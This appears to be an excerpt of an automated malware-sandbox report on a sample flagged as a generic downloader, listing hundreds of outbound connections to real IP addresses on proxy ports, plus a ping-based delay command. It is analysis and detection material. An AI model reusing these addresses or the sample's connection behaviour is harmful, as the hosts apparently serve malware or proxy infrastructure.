                  Source: unknownNetwork traffic detected: HTTP traffic on port 50898 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50873 -> 444
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 11251
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50691 -> 16892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 32708 -> 50650
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50895 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50907 -> 34411
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50394 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50893 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50611 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50915 -> 7890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50871 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50937 -> 15779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50943 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51039 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50985 -> 10089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50991 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50917 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50789 -> 8181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51009 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51112 -> 55392
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5566 -> 50677
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51065 -> 46783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50951 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 35513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51061 -> 15294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10006 -> 50755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51159 -> 8585
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 10647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50444 -> 16487
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50441 -> 57327
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51076 -> 46164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51008 -> 48114
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50975 -> 8084
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51036 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 9091
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51051 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 28810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 58630
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51141 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51210 -> 44374
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51228 -> 6821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51132 -> 14888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51118 -> 808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50291 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51175 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51173 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8899 -> 50248
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50788
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51099 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 17982
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50462 -> 7518
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51104 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51170 -> 4154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51184 -> 29870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51131 -> 5025
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51248 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51137 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8585 -> 51159
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 50816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51209 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50376 -> 55443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51160 -> 63625
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51269 -> 64943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50405 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50312 -> 60651
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51221 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50363 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51325 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51212 -> 5000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51329 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51434 -> 5484
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51328 -> 15280
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51377 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10089 -> 50985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51453 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51172 -> 9002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7890 -> 50915
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50408 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51324 -> 1131
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50385 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9229 -> 50392
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51348 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51351 -> 11201
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51440 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51260 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51364 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 43435
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51371 -> 8123
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51308 -> 6002
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50358 -> 83
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50427 -> 54393
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51365 -> 3629
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50698 -> 25256
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51401 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50487 -> 56755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 20060
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 27294
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51457 -> 47851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51499 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51051
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 50994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14888 -> 51132
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8084 -> 50975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51455 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51517 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50699 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51518 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51426 -> 8118
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 31785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50668 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51492 -> 64309
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51513 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 53778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50803 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50760 -> 52276
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51516 -> 32770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51112 -> 55392
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50756 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4154 -> 51170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51099
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51533 -> 47152
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50777 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50403 -> 52929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 51468
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50475 -> 3629
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51527 -> 21025
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51640 -> 50704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51556 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50430 -> 59727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51509 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51557 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51689 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51721 -> 8595
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51542 -> 7777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50558 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51627 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50792 -> 28810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51547 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50702 -> 10722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51591 -> 58714
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51570 -> 8083
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51606 -> 34405
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51578 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51550 -> 6012
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51348
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51684 -> 46164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50484 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50937 -> 15779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50643 -> 12266
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51210 -> 44374
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51228 -> 6821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51323 -> 8000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 51212
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51760 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50741 -> 41274
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51773 -> 42019
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51635 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8123 -> 51371
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51140
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 51172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51260
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47851 -> 51457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51434 -> 5484
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 12457
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51453 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50686 -> 999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 51513
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16379 -> 49893
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 50803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 47152 -> 51533
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51184 -> 29870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50386 -> 11251
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51045 -> 53281
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51460 -> 43435
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51639 -> 15673
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51624 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51681 -> 9005
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51659 -> 29249
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51745 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51746 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51607 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50986 -> 5443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51696 -> 10000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51675 -> 8197
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51651 -> 8888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51726 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6002 -> 51308
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51653 -> 4153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51762 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51730 -> 18080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51613 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51783 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50708 -> 27898
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50729 -> 25847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51188 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51748 -> 5039
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51668 -> 5678
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51804 -> 64943
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51806 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51811 -> 27360
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51739 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51793 -> 10046
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51800 -> 1081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 26927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51827 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51785 -> 6009
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51155 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51813 -> 8193
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51824 -> 57728
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51799 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51808 -> 8081
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51829 -> 4145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51137 -> 82
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50862 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 51323
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51667 -> 14076
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51831 -> 10089
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50874 -> 16379
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51812 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51823 -> 1080
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51580 -> 31785
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51578
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50905 -> 57377
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51509
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 12334
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51351 -> 11201
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50691 -> 16892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51071 -> 3128
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50926 -> 33382
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51837 -> 8800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50936 -> 62289
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8181 -> 50789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50974 -> 38772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51012 -> 31654
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51640 -> 50704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51721 -> 8595
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51689 -> 32210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 22538
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50524 -> 16379
                  Uses ping.exe to check the status of other devices and networks
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: unknownNetwork traffic detected: IP country count 30
                  Source: global trafficTCP traffic: 192.168.2.5:49713 -> 83.219.145.106:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49710 -> 36.94.234.177:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49714 -> 102.215.65.250:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49715 -> 154.12.253.232:52127
                  Source: global trafficTCP traffic: 192.168.2.5:49717 -> 23.164.240.84:8081
                  Source: global trafficTCP traffic: 192.168.2.5:49719 -> 103.76.188.97:4153
                  Source: global trafficTCP traffic: 192.168.2.5:49723 -> 189.91.85.133:31337
                  Source: global trafficTCP traffic: 192.168.2.5:49724 -> 45.32.131.86:3000
                  Source: global trafficTCP traffic: 192.168.2.5:49725 -> 102.68.128.212:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49728 -> 181.88.73.150:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49729 -> 138.2.73.157:1080
                  Source: global trafficTCP traffic: 192.168.2.5:49731 -> 72.10.160.90:8633
                  Source: global trafficTCP traffic: 192.168.2.5:49732 -> 103.78.201.242:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49733 -> 180.191.254.130:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49734 -> 185.164.163.135:8118
                  Source: global trafficTCP traffic: 192.168.2.5:49735 -> 50.63.12.101:10647
                  Source: global trafficTCP traffic: 192.168.2.5:49736 -> 110.78.149.121:4145
                  Source: global trafficTCP traffic: 192.168.2.5:49737 -> 213.136.78.200:19925
                  Source: global trafficTCP traffic: 192.168.2.5:49739 -> 31.42.184.146:57752
                  Source: global trafficTCP traffic: 192.168.2.5:49742 -> 36.95.102.111:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49743 -> 167.86.74.155:21966
                  Source: global trafficTCP traffic: 192.168.2.5:49745 -> 203.74.125.18:8888
                  Source: global trafficTCP traffic: 192.168.2.5:49747 -> 94.231.199.226:1971
                  Source: global trafficTCP traffic: 192.168.2.5:49748 -> 103.3.77.204:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49749 -> 185.169.181.26:4145
                  Source: global trafficTCP traffic: 192.168.2.5:49751 -> 170.238.160.2:9999
                  Source: global trafficTCP traffic: 192.168.2.5:49754 -> 41.207.251.194:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49756 -> 103.133.25.18:8181
                  Source: global trafficTCP traffic: 192.168.2.5:49758 -> 95.217.104.21:24815
                  Source: global trafficTCP traffic: 192.168.2.5:49759 -> 212.154.82.52:9090
                  Source: global trafficTCP traffic: 192.168.2.5:49760 -> 123.200.6.58:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49761 -> 161.97.163.52:64109
                  Source: global trafficTCP traffic: 192.168.2.5:49762 -> 103.245.204.214:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49764 -> 118.99.96.170:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49767 -> 72.195.34.35:27360
                  Source: global trafficTCP traffic: 192.168.2.5:49768 -> 157.100.6.202:999
                  Source: global trafficTCP traffic: 192.168.2.5:49769 -> 162.19.7.58:42767
                  Source: global trafficTCP traffic: 192.168.2.5:49770 -> 50.238.47.86:32100
                  Source: global trafficTCP traffic: 192.168.2.5:49771 -> 128.199.252.41:8000
                  Source: global trafficTCP traffic: 192.168.2.5:49772 -> 50.227.218.172:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49773 -> 103.105.68.9:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49776 -> 103.148.195.22:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49777 -> 203.142.69.68:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49778 -> 81.134.57.82:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49779 -> 194.163.159.93:35081
                  Source: global trafficTCP traffic: 192.168.2.5:49780 -> 36.92.96.179:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49781 -> 190.97.238.89:999
                  Source: global trafficTCP traffic: 192.168.2.5:49782 -> 103.174.178.133:1020
                  Source: global trafficTCP traffic: 192.168.2.5:49783 -> 107.180.88.41:37597
                  Source: global trafficTCP traffic: 192.168.2.5:49784 -> 5.252.23.249:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49786 -> 117.160.250.163:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49788 -> 197.232.65.40:55443
                  Source: global trafficTCP traffic: 192.168.2.5:49789 -> 166.62.38.100:8730
                  Source: global trafficTCP traffic: 192.168.2.5:49790 -> 68.188.93.171:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49791 -> 191.97.19.66:999
                  Source: global trafficTCP traffic: 192.168.2.5:49793 -> 119.235.54.138:5678
                  Source: global trafficTCP traffic: 192.168.2.5:49794 -> 183.165.224.225:8089
                  Source: global trafficTCP traffic: 192.168.2.5:49795 -> 67.43.227.226:12745
                  Source: global trafficTCP traffic: 192.168.2.5:49796 -> 201.91.82.155:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49797 -> 197.234.13.12:4145
                  Source: global trafficTCP traffic: 192.168.2.5:49798 -> 113.143.37.82:9002
                  Source: global trafficTCP traffic: 192.168.2.5:49800 -> 20.33.5.27:8888
                  Source: global trafficTCP traffic: 192.168.2.5:49801 -> 222.165.223.140:41541
                  Source: global trafficTCP traffic: 192.168.2.5:49802 -> 147.124.212.31:11070
                  Source: global trafficTCP traffic: 192.168.2.5:49804 -> 45.190.248.90:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49806 -> 183.89.41.224:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49807 -> 185.109.184.150:56067
                  Source: global trafficTCP traffic: 192.168.2.5:49809 -> 158.69.53.98:9300
                  Source: global trafficTCP traffic: 192.168.2.5:49810 -> 189.85.82.38:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49812 -> 101.255.158.42:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49813 -> 43.251.119.79:45787
                  Source: global trafficTCP traffic: 192.168.2.5:49814 -> 103.60.186.21:52195
                  Source: global trafficTCP traffic: 192.168.2.5:49811 -> 152.231.106.191:999
                  Source: global trafficTCP traffic: 192.168.2.5:49815 -> 103.107.94.2:44578
                  Source: global trafficTCP traffic: 192.168.2.5:49816 -> 104.238.111.107:56225
                  Source: global trafficTCP traffic: 192.168.2.5:49817 -> 47.101.202.178:7891
                  Source: global trafficTCP traffic: 192.168.2.5:49818 -> 43.155.142.116:15673
                  Source: global trafficTCP traffic: 192.168.2.5:49819 -> 51.178.165.36:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49820 -> 43.255.113.232:8082
                  Source: global trafficTCP traffic: 192.168.2.5:49821 -> 38.127.179.236:2093
                  Source: global trafficTCP traffic: 192.168.2.5:49823 -> 50.63.12.33:22450
                  Source: global trafficTCP traffic: 192.168.2.5:49824 -> 209.126.104.38:12457
                  Source: global trafficTCP traffic: 192.168.2.5:49825 -> 103.83.178.42:8181
                  Source: global trafficTCP traffic: 192.168.2.5:49826 -> 101.255.164.134:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49827 -> 45.81.232.17:21481
                  Source: global trafficTCP traffic: 192.168.2.5:49828 -> 103.199.155.18:6969
                  Source: global trafficTCP traffic: 192.168.2.5:49829 -> 201.174.73.70:11337
                  Source: global trafficTCP traffic: 192.168.2.5:49831 -> 85.117.56.151:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49832 -> 177.53.214.4:999
                  Source: global trafficTCP traffic: 192.168.2.5:49833 -> 88.99.138.21:5088
                  Source: global trafficTCP traffic: 192.168.2.5:49834 -> 45.171.108.253:999
                  Source: global trafficTCP traffic: 192.168.2.5:49835 -> 202.74.245.82:8090
                  Source: global trafficTCP traffic: 192.168.2.5:49836 -> 196.251.221.20:8104
                  Source: global trafficTCP traffic: 192.168.2.5:49837 -> 103.23.101.97:4145
                  Source: global trafficTCP traffic: 192.168.2.5:49839 -> 149.20.253.217:12551
                  Source: global trafficTCP traffic: 192.168.2.5:49840 -> 51.89.173.40:54570
                  Source: global trafficTCP traffic: 192.168.2.5:49841 -> 103.165.155.238:1111
                  Source: global trafficTCP traffic: 192.168.2.5:49842 -> 92.204.135.37:26927
                  Source: global trafficTCP traffic: 192.168.2.5:49844 -> 103.118.175.200:3127
                  Source: global trafficTCP traffic: 192.168.2.5:49845 -> 31.211.142.115:8192
                  Source: global trafficTCP traffic: 192.168.2.5:49846 -> 109.69.0.247:8741
                  Source: global trafficTCP traffic: 192.168.2.5:49848 -> 81.16.248.246:25566
                  Source: global trafficTCP traffic: 192.168.2.5:49849 -> 162.241.6.97:59991
                  Source: global trafficTCP traffic: 192.168.2.5:49850 -> 103.69.90.57:8081
                  Source: global trafficTCP traffic: 192.168.2.5:49851 -> 162.241.46.54:58330
                  Source: global trafficTCP traffic: 192.168.2.5:49852 -> 72.10.164.178:26959
                  Source: global trafficTCP traffic: 192.168.2.5:49853 -> 182.253.181.10:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49854 -> 72.195.34.58:4145
                  Source: global trafficTCP traffic: 192.168.2.5:49856 -> 37.32.98.160:8998
                  Source: global trafficTCP traffic: 192.168.2.5:49859 -> 209.222.97.30:19481
                  Source: global trafficTCP traffic: 192.168.2.5:49860 -> 216.107.129.135:10180
                  Source: global trafficTCP traffic: 192.168.2.5:49861 -> 54.39.50.68:8216
                  Source: global trafficTCP traffic: 192.168.2.5:49862 -> 212.108.144.67:8080
                  Source: global trafficTCP traffic: 192.168.2.5:49863 -> 134.209.29.120:3128
                  Source: global trafficTCP traffic: 192.168.2.5:49864 -> 162.241.53.72:57364
                  Source: global trafficTCP traffic: 192.168.2.5:49865 -> 138.68.24.185:55010
                  Source: global trafficTCP traffic: 192.168.2.5:49866 -> 72.10.160.171:5105
                  Source: global trafficTCP traffic: 192.168.2.5:49867 -> 87.238.192.249:34320
